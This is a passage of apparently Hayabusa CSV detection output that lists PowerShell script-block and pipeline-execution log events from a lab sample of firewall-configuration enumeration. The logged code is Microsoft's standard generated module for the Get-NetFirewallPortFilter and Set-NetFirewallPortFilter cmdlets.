Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 
'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] 
[string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { 
[object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 
Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; 
value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', 
SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null 